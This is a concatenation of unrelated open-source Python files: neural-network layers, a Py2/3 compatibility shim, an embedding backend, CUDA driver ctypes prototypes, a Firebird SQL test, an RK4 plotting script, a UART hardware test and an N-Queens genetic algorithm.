Inception(512, 112, 144, 288, 32, 64, 64), # N x 528 x 14 x 14
Inception(528, 256, 160, 320, 32, 128, 128), # N x 832 x 14 x 14
nn.MaxPool2d(2, stride=2, ceil_mode=True), # N x 832 x 7 x 7
Inception(832, 256, 160, 320, 32, 128, 128), # N x 1024 x 7 x 7
Inception(832, 384, 192, 384, 48, 128, 128), # N x 1024 x 7 x 7
]
self.features_out = [
64, 64, 64, 192, 192,
256, 480, 480,
512, 512, 512, 528, 832, 832,
1024, 1024
]
self.model = nn.Sequential(*self.features)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1)),
self.dropout = nn.Dropout(dropout),
self.fc = nn.Linear(1024, num_classes),
def forward(self, x: Tensor):
x = self.model(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
x = self.dropout(x)
x = self.fc(x)
return x
|
"""Python 2/3 compat layer."""
from __future__ import print_function, division, absolute_import
try:
basestring
except NameError:
basestring = str
try:
unicode
except NameError:
unicode = str
try:
unichr
bytechr = chr
byteord = ord
except:
unichr = chr
def bytechr(n):
return bytes([n])
def byteord(c):
return c if isinstance(c, int) else ord(c)
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
def strjoin(iterable, joiner=''):
return tostr(joiner).join(iterable)
def tobytes(s, encoding='ascii', errors='strict'):
if not isinstance(s, bytes):
return s.encode(encoding, errors)
else:
return s
def tounicode(s, encoding='ascii', errors='strict'):
if not isinstance(s, unicode):
return s.decode(encoding, errors)
else:
return s
if str == bytes:
class Tag(str):
def tobytes(self):
if isinstance(self, bytes):
return self
else:
return self.encode('latin1')
tostr = tobytes
bytesjoin = strjoin
else:
class Tag(str):
@staticmethod
def transcode(blob):
if not isinstance(blob, str):
blob = blob.decode('latin-1')
return blob
def __new__(self, content):
return str.__new__(self, self.transcode(content))
def __ne__(self, other):
return not self.__eq__(other)
def __eq__(self, other):
return str.__eq__(self, self.transcode(other))
def __hash__(self):
return str.__hash__(self)
def tobytes(self):
return self.encode('latin-1')
tostr = tounicode
def bytesjoin(iterable, joiner=b''):
return tobytes(joiner).join(tobytes(item) for item in iterable)
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
r'''Backend of embedding tables.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
from tensorflow.python.saved_model.model_utils import mode_keys
from hybridbackend.tensorflow.framework.context import Context
class EmbeddingBackend(object): # pylint: disable=useless-object-inheritance
r'''Backend for embedding columns.
An embedding backend manages underlying storage for embedding columns. Data
scientists can extend this class for customized implementation of embedding
weights.
'''
_registry = {}
@classmethod
def register(cls, impl):
r'''Register implementation.
Args:
impl: Implementation to register.
'''
cls._registry[impl.NAME] = impl
@classmethod
def get(cls):
r'''Get an instance of registered implementation.
Returns:
An instance of registered implementation.
'''
backend = Context.get().options.emb_backend
if backend not in cls._registry:
raise ValueError(f'emb_backend is invalid: {backend}')
return cls._registry[backend]
@abc.abstractmethod
def build(
self,
column,
name,
shape,
dtype=None,
trainable=True,
use_resource=True,
initializer=None,
collections=None,
layer=None):
r'''Creates the embedding lookup weight.
Args:
column: An `EmbeddingColumn` for building weight.
name: Name of the embedding weights.
shape: Shape of the embedding weights.
dtype: (Optional.) Data type of the embedding weights.
trainable: (Optional.) If True, the embedding weights can be trained.
use_resource: (Optional.) If True, the embedding weights uses resource.
initializer: (Optional.) Initializer of the embedding weights.
collections: (Optional.) Collections of the embedding weights.
layer: `DenseFeatures` layer which manages weights.
Returns:
The embedding weight.
'''
@abc.abstractmethod
def init_from_checkpoint(
self, column, ckpt_dir_or_file, tensor_name_in_ckpt, to_restore):
r'''Replaces initializers of embedding weights to load from checkpoints.
Args:
column: An `EmbeddingColumn`.
ckpt_dir_or_file: Directory with checkpoints file or path to checkpoint
or checkpoint file path.
tensor_name_in_ckpt: Name of the `Tensor` in `ckpt_dir_or_file` from
which to restore the column weights. Required if `ckpt_to_load_from`
is not `None`.
to_restore: `Tensor` to restore.
'''
@abc.abstractmethod
def lookup(self, column, weight, inputs, sharded=False, buffered=False):
r'''Lookup for embedding vectors.
Args:
column: An `EmbeddingColumn`.
weight: Embedding weight.
inputs: Inputs for embedding lookup.
sharded: If True inputs are sharded.
buffered: If True initialization would be delayed.
Returns:
Embedding vectors from the weight.
'''
@abc.abstractmethod
def update(self, column, weight, indexed_updates):
r'''Update embedding weight.
Args:
column: An `EmbeddingColumn`.
weight: Embedding weight.
indexed_updates: An `IndexedSlices` to update weight in specific indices.
'''
def buffer_size(self):
r'''Buffer size of embedding variables for training.
'''
return Context.get().options.emb_buffer_size
def buffer_load_factor(self):
r'''Buffer load factor of embedding variables for training.
'''
return Context.get().options.emb_buffer_load_factor
def num_groups(self):
r'''Number of embedding column groups for training.
'''
return Context.get().options.emb_num_groups
def enable_concat(self):
r'''If True, concat embedding vectors for training.
'''
return Context.get().options.emb_enable_concat
def num_buckets(self, column):
r'''Number of buckets for the column.
'''
num_buckets = getattr(
column.categorical_column, 'num_buckets',
column.categorical_column._num_buckets) # pylint: disable=protected-access
return num_buckets
def dimension(self, column):
r'''Dimension of the column.
'''
return column.dimension
@property
def enable_sharding(self):
r'''Whether the sharding is enabled.
'''
return not mode_keys.is_predict(Context.get().options.mode)
def sharded(self, column):
r'''Whether the column should be sharded.
'''
if Context.get().world_size <= 1:
return False
if not self.enable_sharding:
return False
batch_size = Context.get().options.batch_size
if batch_size < 0 or self.num_buckets(column) is None:
return True
if batch_size < self.num_buckets(column):
return True
return False
def unique(self, column):
r'''Whether inputs for the column is already unique.
'''
return Context.get().options.emb_unique[column.categorical_column.name]
def device(self, column):
r'''Device of the column weights.
'''
return Context.get().options.emb_device[column.categorical_column.name]
def input_device(self, column):
r'''Device of embedding lookup inputs.
'''
options = Context.get().options
return options.emb_input_device[column.categorical_column.name]
def dtype(self, column):
r'''Data type of the column weights.
'''
return Context.get().options.emb_dtype[column.categorical_column.name]
def wire_dtype(self, column):
r'''Data type of the column for communicaiton.
'''
return Context.get().options.emb_wire_dtype[column.categorical_column.name]
def input_dtype(self, column):
r'''Data type of the column inputs.
'''
return Context.get().options.emb_input_dtype[column.categorical_column.name]
def segment_rank(self, column):
r'''Segment rank of the column weights.
'''
options = Context.get().options
return options.emb_segment_rank[column.categorical_column.name]
def weight_name(self, column):
r'''Name of the column weights.
'''
name = 'embedding_weights'
if self.sharded(column):
shard = Context.get().rank
name = f'{name}/part_{shard}'
return name
def weight_shared_name(self, column, var):
r'''Get shared name of the column weights from an variable.
'''
var_name = var.name.split(':')[0]
if self.sharded(column):
return var_name.split('/part')[0]
return var_name
|
from ctypes import *
from numba.cuda.cudadrv import _extras
cu_device = c_int
cu_device_attribute = c_int # enum
cu_context = c_void_p # an opaque handle
cu_module = c_void_p # an opaque handle
cu_jit_option = c_int # enum
cu_jit_input_type = c_int # enum
cu_function = c_void_p # an opaque handle
cu_device_ptr = c_size_t # defined as unsigned int on 32-bit
# and unsigned long long on 64-bit machine
cu_stream = c_void_p # an opaque handle
cu_event = c_void_p
cu_link_state = c_void_p
cu_function_attribute = c_int
cu_ipc_mem_handle = (c_byte * _extras.CUDA_IPC_HANDLE_SIZE) # 64 bytes wide
cu_stream_callback_pyobj = CFUNCTYPE(None, cu_stream, c_int, py_object)
cu_occupancy_b2d_size = CFUNCTYPE(c_size_t, c_int)
# See https://docs.nvidia.com/cuda/cuda-driver-api/group__CUDA__TYPES.html
CU_STREAM_DEFAULT = 0
CU_STREAM_LEGACY = 1
CU_STREAM_PER_THREAD = 2
API_PROTOTYPES = {
# CUresult cuInit(unsigned int Flags);
'cuInit' : (c_int, c_uint),
# CUresult cuDriverGetVersion ( int* driverVersion )
'cuDriverGetVersion': (c_int, POINTER(c_int)),
# CUresult cuDeviceGetCount(int *count);
'cuDeviceGetCount': (c_int, POINTER(c_int)),
# CUresult cuDeviceGet(CUdevice *device, int ordinal);
'cuDeviceGet': (c_int, POINTER(cu_device), c_int),
# CUresult cuDeviceGetName ( char* name, int len, CUdevice dev )
'cuDeviceGetName': (c_int, c_char_p, c_int, cu_device),
# CUresult cuDeviceGetAttribute(int *pi, CUdevice_attribute attrib,
# CUdevice dev);
'cuDeviceGetAttribute': (c_int, POINTER(c_int), cu_device_attribute,
cu_device),
# CUresult cuDeviceComputeCapability(int *major, int *minor,
# CUdevice dev);
'cuDeviceComputeCapability': (c_int, POINTER(c_int), POINTER(c_int),
cu_device),
# CUresult cuDevicePrimaryCtxGetState ( CUdevice dev, unsigned int* flags, int* active )
'cuDevicePrimaryCtxGetState': (c_int,
cu_device, POINTER(c_uint), POINTER(c_int)),
# CUresult cuDevicePrimaryCtxRelease ( CUdevice dev )
'cuDevicePrimaryCtxRelease': (c_int, cu_device),
# CUresult cuDevicePrimaryCtxReset ( CUdevice dev )
'cuDevicePrimaryCtxReset': (c_int, cu_device),
# CUresult cuDevicePrimaryCtxRetain ( CUcontext* pctx, CUdevice dev )
'cuDevicePrimaryCtxRetain': (c_int, POINTER(cu_context), cu_device),
# CUresult cuDevicePrimaryCtxSetFlags ( CUdevice dev, unsigned int flags )
'cuDevicePrimaryCtxSetFlags': (c_int, cu_device, c_uint),
# CUresult cuCtxCreate(CUcontext *pctx, unsigned int flags,
# CUdevice dev);
'cuCtxCreate': (c_int, POINTER(cu_context), c_uint, cu_device),
# CUresult cuCtxGetDevice ( CUdevice * device )
'cuCtxGetDevice': (c_int, POINTER(cu_device)),
# CUresult cuCtxGetCurrent (CUcontext *pctx);
'cuCtxGetCurrent': (c_int, POINTER(cu_context)),
# CUresult cuCtxPushCurrent (CUcontext pctx);
'cuCtxPushCurrent': (c_int, cu_context),
# CUresult cuCtxPopCurrent (CUcontext *pctx);
'cuCtxPopCurrent': (c_int, POINTER(cu_context)),
# CUresult cuCtxDestroy(CUcontext pctx);
'cuCtxDestroy': (c_int, cu_context),
# CUresult cuModuleLoadDataEx(CUmodule *module, const void *image,
# unsigned int numOptions,
# CUjit_option *options,
# void **optionValues);
'cuModuleLoadDataEx': (c_int, cu_module, c_void_p, c_uint,
POINTER(cu_jit_option), POINTER(c_void_p)),
# CUresult cuModuleUnload(CUmodule hmod);
'cuModuleUnload': (c_int, cu_module),
# CUresult cuModuleGetFunction(CUfunction *hfunc, CUmodule hmod,
# const char *name);
'cuModuleGetFunction': (c_int, cu_function, cu_module, c_char_p),
# CUresult cuModuleGetGlobal ( CUdeviceptr* dptr, size_t* bytes, CUmodule
# hmod, const char* name )
'cuModuleGetGlobal': (c_int, POINTER(cu_device_ptr), POINTER(c_size_t),
cu_module, c_char_p),
# CUresult CUDAAPI cuFuncSetCacheConfig(CUfunction hfunc,
# CUfunc_cache config);
'cuFuncSetCacheConfig': (c_int, cu_function, c_uint),
# CUresult cuMemAlloc(CUdeviceptr *dptr, size_t bytesize);
'cuMemAlloc': (c_int, POINTER(cu_device_ptr), c_size_t),
# CUresult cuMemsetD8(CUdeviceptr dstDevice, unsigned char uc, size_t N)
'cuMemsetD8': (c_int, cu_device_ptr, c_uint8, c_size_t),
# CUresult cuMemsetD8Async(CUdeviceptr dstDevice, unsigned char uc,
# size_t N, CUstream hStream);
'cuMemsetD8Async': (c_int,
cu_device_ptr, c_uint8, c_size_t, cu_stream),
# CUresult cuMemcpyHtoD(CUdeviceptr dstDevice, const void *srcHost,
# size_t ByteCount);
'cuMemcpyHtoD': (c_int, cu_device_ptr, c_void_p, c_size_t),
# CUresult cuMemcpyHtoDAsync(CUdeviceptr dstDevice, const void *srcHost,
# size_t ByteCount, CUstream hStream);
'cuMemcpyHtoDAsync': (c_int, cu_device_ptr, c_void_p, c_size_t,
cu_stream),
# CUresult cuMemcpyHtoD(CUdeviceptr dstDevice, const void *srcHost,
# size_t ByteCount);
'cuMemcpyDtoD': (c_int, cu_device_ptr, cu_device_ptr, c_size_t),
# CUresult cuMemcpyHtoDAsync(CUdeviceptr dstDevice, const void *srcHost,
# size_t ByteCount, CUstream hStream);
'cuMemcpyDtoDAsync': (c_int, cu_device_ptr, cu_device_ptr, c_size_t,
cu_stream),
# CUresult cuMemcpyDtoH(void *dstHost, CUdeviceptr srcDevice,
# size_t ByteCount);
'cuMemcpyDtoH': (c_int, c_void_p, cu_device_ptr, c_size_t),
# CUresult cuMemcpyDtoHAsync(void *dstHost, CUdeviceptr srcDevice,
# size_t ByteCount, CUstream hStream);
'cuMemcpyDtoHAsync': (c_int, c_void_p, cu_device_ptr, c_size_t,
cu_stream),
# CUresult cuMemFree(CUdeviceptr dptr);
'cuMemFree': (c_int, cu_device_ptr),
# CUresult cuStreamCreate(CUstream *phStream, unsigned int Flags);
'cuStreamCreate': (c_int, POINTER(cu_stream), c_uint),
# CUresult cuStreamDestroy(CUstream hStream);
'cuStreamDestroy': (c_int, cu_stream),
# CUresult cuStreamSynchronize(CUstream hStream);
'cuStreamSynchronize': (c_int, cu_stream),
# CUresult cuStreamAddCallback(CUstream hStream, CUstreamCallback callback, void* userData, unsigned int flags)
'cuStreamAddCallback': (c_int, cu_stream, cu_stream_callback_pyobj, py_object, c_uint),
# CUresult cuLaunchKernel(CUfunction f, unsigned int gridDimX,
# unsigned int gridDimY,
# unsigned int gridDimZ,
# unsigned int blockDimX,
# unsigned int blockDimY,
# unsigned int blockDimZ,
# unsigned int sharedMemBytes,
# CUstream hStream, void **kernelParams,
# void ** extra)
'cuLaunchKernel': (c_int, cu_function, c_uint, c_uint, c_uint,
c_uint, c_uint, c_uint, c_uint, cu_stream,
POINTER(c_void_p), POINTER(c_void_p)),
# CUresult cuMemHostAlloc ( void ** pp,
# size_t bytesize,
# unsigned int Flags
# )
'cuMemHostAlloc': (c_int, c_void_p, c_size_t, c_uint),
# CUresult cuMemFreeHost ( void * p )
'cuMemFreeHost': (c_int, c_void_p),
# CUresult cuMemHostRegister(void * p,
# size_t bytesize,
# unsigned int Flags)
'cuMemHostRegister': (c_int, c_void_p, c_size_t, c_uint),
# CUresult cuMemHostUnregister(void * p)
'cuMemHostUnregister': (c_int, c_void_p),
# CUresult cuMemHostGetDevicePointer(CUdeviceptr * pdptr,
# void * p,
# unsigned int Flags)
'cuMemHostGetDevicePointer': (c_int, POINTER(cu_device_ptr),
c_void_p, c_uint),
# CUresult cuMemGetInfo(size_t * free, size_t * total)
'cuMemGetInfo' : (c_int, POINTER(c_size_t), POINTER(c_size_t)),
# CUresult cuEventCreate ( CUevent * phEvent,
# unsigned int Flags )
'cuEventCreate': (c_int, POINTER(cu_event), c_uint),
# CUresult cuEventDestroy ( CUevent hEvent )
'cuEventDestroy': (c_int, cu_event),
# CUresult cuEventElapsedTime ( float * pMilliseconds,
# CUevent hStart,
# CUevent hEnd )
'cuEventElapsedTime': (c_int, POINTER(c_float), cu_event, cu_event),
# CUresult cuEventQuery ( CUevent hEvent )
'cuEventQuery': (c_int, cu_event),
# CUresult cuEventRecord ( CUevent hEvent,
# CUstream hStream )
'cuEventRecord': (c_int, cu_event, cu_stream),
# CUresult cuEventSynchronize ( CUevent hEvent )
'cuEventSynchronize': (c_int, cu_event),
# CUresult cuStreamWaitEvent ( CUstream hStream,
# CUevent hEvent,
# unsigned int Flags )
'cuStreamWaitEvent': (c_int, cu_stream, cu_event, c_uint),
# CUresult cuPointerGetAttribute (void *data, CUpointer_attribute attribute, CUdeviceptr ptr)
'cuPointerGetAttribute': (c_int, c_void_p, c_uint, cu_device_ptr),
# CUresult cuMemGetAddressRange ( CUdeviceptr * pbase,
# size_t * psize,
# CUdeviceptr dptr
# )
'cuMemGetAddressRange': (c_int,
POINTER(cu_device_ptr),
POINTER(c_size_t),
cu_device_ptr),
# CUresult cuMemHostGetFlags ( unsigned int * pFlags,
# void * p )
'cuMemHostGetFlags': (c_int,
POINTER(c_uint),
c_void_p),
# CUresult cuCtxSynchronize ( void )
'cuCtxSynchronize' : (c_int,),
# CUresult
# cuLinkCreate(unsigned int numOptions, CUjit_option *options,
# void **optionValues, CUlinkState *stateOut);
'cuLinkCreate': (c_int,
c_uint, POINTER(cu_jit_option),
POINTER(c_void_p), POINTER(cu_link_state)),
# CUresult
# cuLinkAddData(CUlinkState state, CUjitInputType type, void *data,
# size_t size, const char *name, unsigned
# int numOptions, CUjit_option *options,
# void **optionValues);
'cuLinkAddData': (c_int,
cu_link_state, cu_jit_input_type, c_void_p,
c_size_t, c_char_p, c_uint, POINTER(cu_jit_option),
POINTER(c_void_p)),
# CUresult
# cuLinkAddFile(CUlinkState state, CUjitInputType type,
# const char *path, unsigned int numOptions,
# CUjit_option *options, void **optionValues);
'cuLinkAddFile': (c_int,
cu_link_state, cu_jit_input_type, c_char_p, c_uint,
POINTER(cu_jit_option), POINTER(c_void_p)),
# CUresult CUDAAPI
# cuLinkComplete(CUlinkState state, void **cubinOut, size_t *sizeOut)
'cuLinkComplete': (c_int,
cu_link_state, POINTER(c_void_p), POINTER(c_size_t)),
# CUresult CUDAAPI
# cuLinkDestroy(CUlinkState state)
'cuLinkDestroy': (c_int, cu_link_state),
# cuProfilerInitialize ( const char* configFile, const char*
# outputFile, CUoutput_mode outputMode )
# 'cuProfilerInitialize': (c_int, c_char_p, c_char_p, cu_output_mode),
# cuProfilerStart ( void )
'cuProfilerStart': (c_int,),
# cuProfilerStop ( void )
'cuProfilerStop': (c_int,),
# CUresult cuFuncGetAttribute ( int* pi, CUfunction_attribute attrib,
# CUfunction hfunc )
'cuFuncGetAttribute': (c_int,
POINTER(c_int), cu_function_attribute, cu_function),
# CUresult CUDAAPI cuOccupancyMaxActiveBlocksPerMultiprocessor(int *numBlocks,
# CUfunction func,
# int blockSize,
# size_t dynamicSMemSize);
'cuOccupancyMaxActiveBlocksPerMultiprocessor': (c_int,
POINTER(c_int), cu_function, c_size_t, c_uint),
# CUresult CUDAAPI cuOccupancyMaxActiveBlocksPerMultiprocessorWithFlags(int *numBlocks,
# CUfunction func,
# int blockSize,
# size_t dynamicSMemSize,
# unsigned int flags);
'cuOccupancyMaxActiveBlocksPerMultiprocessor': (c_int,
POINTER(c_int), cu_function, c_size_t, c_uint),
# CUresult CUDAAPI cuOccupancyMaxPotentialBlockSize(int *minGridSize, int *blockSize,
# CUfunction func, CUoccupancyB2DSize blockSizeToDynamicSMemSize,
# size_t dynamicSMemSize, int blockSizeLimit);
'cuOccupancyMaxPotentialBlockSize': (c_int,
POINTER(c_int), POINTER(c_int), cu_function, cu_occupancy_b2d_size, c_size_t, c_int),
# CUresult CUDAAPI cuOccupancyMaxPotentialBlockSizeWithFlags(int *minGridSize, int *blockSize,
# CUfunction func, CUoccupancyB2DSize blockSizeToDynamicSMemSize,
# size_t dynamicSMemSize, int blockSizeLimit, unsigned int flags);
'cuOccupancyMaxPotentialBlockSizeWithFlags': (c_int,
POINTER(c_int), POINTER(c_int), cu_function, cu_occupancy_b2d_size, c_size_t, c_int, c_uint),
# CUresult cuIpcGetMemHandle ( CUipcMemHandle* pHandle, CUdeviceptr dptr )
'cuIpcGetMemHandle': (c_int,
POINTER(cu_ipc_mem_handle), cu_device_ptr),
# CUresult cuIpcOpenMemHandle ( CUdeviceptr* pdptr, CUipcMemHandle handle, unsigned int Flags )
'cuIpcOpenMemHandle': (c_int,
POINTER(cu_device_ptr), cu_ipc_mem_handle, c_uint),
# CUresult cuIpcCloseMemHandle ( CUdeviceptr dptr )
'cuIpcCloseMemHandle': (c_int,
cu_device_ptr),
# CUresult cuCtxEnablePeerAccess ( CUcontext peerContext, unsigned int Flags )
'cuCtxEnablePeerAccess': (c_int,
cu_context, c_int),
# CUresult cuDeviceCanAccessPeer ( int* canAccessPeer,
# CUdevice dev, CUdevice peerDev )
'cuDeviceCanAccessPeer': (c_int,
POINTER(c_int), cu_device, cu_device),
}
|
#coding:utf-8
#
# id: functional.arno.indices.upper_bound_asc_01_segments_02
# title: ASC single index upper bound
# decription: Check if all 32 values are fetched with "lower than" operator.
# tracker_id:
# min_versions: []
# versions: 1.5
# qmid: functional.arno.indexes.upper_bound_asc_01_segments_02
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 1.5
# resources: None
substitutions_1 = []
init_script_1 = """CREATE TABLE Table_66 (
ID INTEGER
);
SET TERM ^^ ;
CREATE PROCEDURE PR_FillTable_66
AS
DECLARE VARIABLE FillID INTEGER;
BEGIN
FillID = 2147483647;
WHILE (FillID > 0) DO
BEGIN
INSERT INTO Table_66 (ID) VALUES (:FillID);
FillID = FillID / 2;
END
INSERT INTO Table_66 (ID) VALUES (NULL);
INSERT INTO Table_66 (ID) VALUES (0);
INSERT INTO Table_66 (ID) VALUES (NULL);
FillID = -2147483648;
WHILE (FillID < 0) DO
BEGIN
INSERT INTO Table_66 (ID) VALUES (:FillID);
FillID = FillID / 2;
END
END
^^
SET TERM ; ^^
COMMIT;
EXECUTE PROCEDURE PR_FillTable_66;
COMMIT;
CREATE ASC INDEX I_Table_66_ASC ON Table_66 (ID);
COMMIT;
"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """SET PLAN ON;
SELECT
ID
FROM
Table_66 t66
WHERE
t66.ID < 0;"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """PLAN (T66 INDEX (I_TABLE_66_ASC))
ID
============
-2147483648
-1073741824
-536870912
-268435456
-134217728
-67108864
-33554432
-16777216
-8388608
-4194304
-2097152
-1048576
-524288
-262144
-131072
-65536
-32768
-16384
-8192
-4096
ID
============
-2048
-1024
-512
-256
-128
-64
-32
-16
-8
-4
-2
-1"""
@pytest.mark.version('>=1.5')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_stdout == act_1.clean_expected_stdout
|
#!/usr/bin/env python
""" Here we draw the 2-D phase portrait of the equations """
import numpy as np
import matplotlib.pyplot as plt
from runge_kutta4 import rk4
def x_dot(t, x):
return x[1]
def u_dot(t, x):
gamma1 = 0.1
a1 = 3
b1 = 2.2
epsilon1 = 17.09
omega1 = 2 * np.pi
c1 = 2.2
Omega = 15
return -(gamma1 + a1 * x[0] ** 2 + b1 * x[2] ** 2) * x[1]\
- omega1 ** 2 * (1 + epsilon1 * np.sin(2 * Omega * t)) * x[0]\
- c1 * x[2] ** 2 * np.sin(Omega * t)
def y_dot(t, x):
return x[3]
def v_dot(t, x):
gamma2 = 0.1
epsilon2 = 2.99
omega2 = 2 * np.pi
d2 = 10
a2 = 9.8
b2 = 2.2
Omega = 15
return -(gamma2 + a2 * x[2] ** 2 + b2 * x[0] ** 2) * x[3]\
-omega2 ** 2 * (1 + epsilon2 * np.sin(2 * Omega * t)) * x[2]\
- d2 * x[1]
def main():
""" main body """
dots = [x_dot, u_dot, y_dot, v_dot]
x_init = [0.1, 0, 0.1, 0]
step = 0.005
end = 50
time, data = rk4(x_init, dots, step, end)
# plot y(t)
plt.plot(time, data[2], lw=1, label='x(t)')
plt.legend()
plt.savefig('yplot.jpg', dpi=200, bbox_inches='tight')
plt.show()
# plot phase portrait for (x, u)
plt.plot(data[0], data[1], lw=1, label='u(x)')
plt.xlabel('x')
plt.ylabel('u')
plt.legend()
plt.title('phase portrait u(x)')
plt.savefig('portrait_xu.jpg', dpi=200, bbox_inches='tight')
plt.show()
# plot phase portrait for (y, v)
plt.plot(data[2], data[3], lw=1, label='v(y)')
plt.xlabel('y')
plt.ylabel('v')
plt.legend()
plt.title('phase portrait u(x)')
plt.savefig('portrait_yv.jpg', dpi=200, bbox_inches='tight')
plt.show()
if __name__ == "__main__":
main()
|
'''
P11 and P12 must be connected together for this test to pass.
'''
from machine import UART
from machine import Pin
import os
import time
# do not execute this test on the GPy and FiPy
if os.uname().sysname == 'GPy' or os.uname().sysname == 'FiPy':
print("SKIP")
import sys
sys.exit()
uart = UART(2, 115200)
print(uart)
uart.init(57600, 8, None, 1, pins=('P11', 'P12'))
uart.init(baudrate=9600, stop=2, parity=UART.EVEN, pins=('P11', 'P12'))
uart.init(baudrate=115200, parity=UART.ODD, stop=1, pins=('P11', 'P12'))
uart.read()
print (uart.read())
print (uart.readline())
buff = bytearray(1)
print (uart.readinto(buff, 1))
print (uart.read())
print (uart.any())
print (uart.write('a'))
uart.deinit()
uart = UART(2, 1000000, pins=('P12', 'P11'))
print(uart)
uart.read()
print(uart.write(b'123456') == 6)
print(uart.read() == b'123456')
uart.deinit()
uart = UART(2, 1000000, pins=('P11', 'P12'))
print(uart)
uart.read()
print(uart.write(b'123456') == 6)
print(uart.read() == b'123456')
uart.deinit()
uart = UART(2, 1000000, pins=('P11', 'P12'))
print(uart.write(b'123') == 3)
print(uart.read(1) == b'1')
print(uart.read(2) == b'23')
print(uart.read() == None)
uart.write(b'123')
buf = bytearray(3)
print(uart.readinto(buf, 1) == 1)
print(buf)
print(uart.readinto(buf) == 2)
print(buf)
uart.deinit()
# check for memory leaks...
for i in range (0, 1000):
uart = UART(2, 1000000)
uart.deinit()
# next ones must raise
try:
UART(2, 9600, parity=None, pins=('GP12', 'GP13', 'GP7'))
except Exception:
print('Exception')
try:
UART(2, 9600, parity=UART.ODD, pins=('GP12', 'GP7'))
except Exception:
print('Exception')
# buffer overflow
uart = UART(2, 1000000, pins=('P11', 'P12'))
buf = bytearray([0x55AA] * 567)
for i in range(200):
r = uart.write(buf)
r = uart.read()
r = uart.read()
print(r)
print(uart.write(b'123456') == 6)
print(uart.read() == b'123456')
uart.deinit()
|
# Copyright (C) 2019 "Daniel Bramblett" <daniel.r.bramblett@gmail.com>
import numpy as np
import random
from board_state import BoardState
# The instance that is the genetic algorithm which manages the population each generation and performs the crossover
# and mutation operation.
class GeneticAlgorithm:
# The size of the population each generation.
population_size = 0
# The number of rows of the N-Queens problem. Note that this also the number of of columns.
number_of_rows = 8
# The list of the average fitness score for each generation.
average_fitness_per_generation = list()
# The list containing each member of the population.
population = None
# The list containing the new members generated during the current generation.
new_population = None
# The weight of the mutation rate used to weight the random pick.
weights = None
# The number of members checked for the tournament selection.
tournament_size = 4
# Initializes the fields in the class using the default or passed-in parameters. The initial population is then
# randomly generated.
def __init__(self, pop_size=100, mutation_rate=0.01, row_numb=8, tournament_size=4):
self.population_size = pop_size
self.number_of_rows = row_numb
self.weights = [1 - mutation_rate, mutation_rate]
self.generation_samples = list()
self.tournament_size = tournament_size
self.population = [BoardState(number_of_rows=self.number_of_rows) for _ in range(self.population_size)]
self.population.sort(reverse=True)
# Mutation operator that takes two indexes in the permutation and swaps them.
def __mutation_operator__(self, child):
swap_targets = random.sample(range(self.number_of_rows), 2)
temp = child.state[swap_targets[0]]
child.state[swap_targets[0]] = child.state[swap_targets[1]]
child.state[swap_targets[1]] = temp
# This function takes a state for the children. It then randomly decides if the child gets mutated or not. If the
# child is going to be mutated, the child is initialized and passed into the mutation operator to perform the
# mutation. Otherwise, the child is initialized and added to the new population without being mutated.
def __consider_mutate__(self, child_state):
if random.choices([0, 1], self.weights, k=1)[0]:
child = BoardState(child_state)
self.__mutation_operator__(child)
self.new_population.append(child)
else:
self.new_population.append(BoardState(child_state))
# Crossover operator that generates two new children using two parents from the current generation.
def __crossover_operator__(self, parent_a, parent_b):
first_child_state = parent_a.state.copy()
second_child_state = parent_b.state.copy()
indices_used = list()
for current_index in range(self.number_of_rows):
if current_index in indices_used:
break
if first_child_state[current_index] == second_child_state[current_index]:
indices_used.append(current_index)
break
index_order = list()
value_order = list()
index_order.append(current_index)
value_order.append(first_child_state[current_index])
search_value = second_child_state[current_index]
while search_value != value_order[0]:
found = np.where(first_child_state == search_value)[0][0]
index_order.append(found)
value_order.append(search_value)
search_value = second_child_state[found]
for current in range(len(index_order) - 1):
first_child_state[index_order[current + 1]] = second_child_state[index_order[current - 1]] = value_order[current]
first_child_state[index_order[0]] = value_order[-1]
second_child_state[index_order[len(index_order) - 2]] = value_order[-1]
while len(index_order) > 0:
indices_used.append(index_order.pop(0))
self.__consider_mutate__(first_child_state)
self.__consider_mutate__(second_child_state)
# Uses tournament selection to select a member of the population as a parent.
def __select_parent__(self):
return self.population[min(random.sample(range(self.population_size), self.tournament_size))]
# Uses the current generation to generate the next generation.
def generate_next_generation(self):
self.new_population = list()
while len(self.new_population) < self.population_size:
self.__crossover_operator__(self.__select_parent__(), self.__select_parent__())
if len(self.new_population) > self.population_size:
self.new_population.pop()
self.population = self.new_population
self.population.sort(reverse=True)
# Current generation statistics.
def generation_statistics(self):
average_fitness = 0
max_fitness = 0
# Goes through each member of the population and calculates the average fitness while keeping track of the
# highest fitness score observed.
for current_member in self.population:
average_fitness += current_member.fitness_value
if current_member.fitness_value > max_fitness:
max_fitness = current_member.fitness_value
return average_fitness / self.population_size, max_fitness
# This function finds the member of the population with the highest fitness score and returns it.
def top_member(self):
# Initially assumes that the first member of the population has the highest fitness score and saves its index
# and fitness score.
current_top_fitness = self.population[0].fitness_value
current_top_index = list()
current_top_index.append(0)
# Goes through each member of the population and checks there fitness score against the current top. If it's
# higher, the current member becomes the new top member and the fitness score and list of top indexes is
# updated.
# If the fitness score is equal to the top fitness score, the index is saved as a tie for the top fitness score.
for current_member in range(1, self.population_size):
if current_top_fitness < self.population[current_member].fitness_value:
current_top_index.clear()
current_top_index.append(current_member)
current_top_fitness = self.population[current_member].fitness_value
elif current_top_fitness == self.population[current_member].fitness_value:
current_top_index.append(current_member)
# From the list of top fitness score members, one is randomly chosen to be returned as a reference.
return self.population[random.choice(current_top_index)]
|
# Copyright (c) 2017 The WebRTC project authors. All Rights Reserved.
#
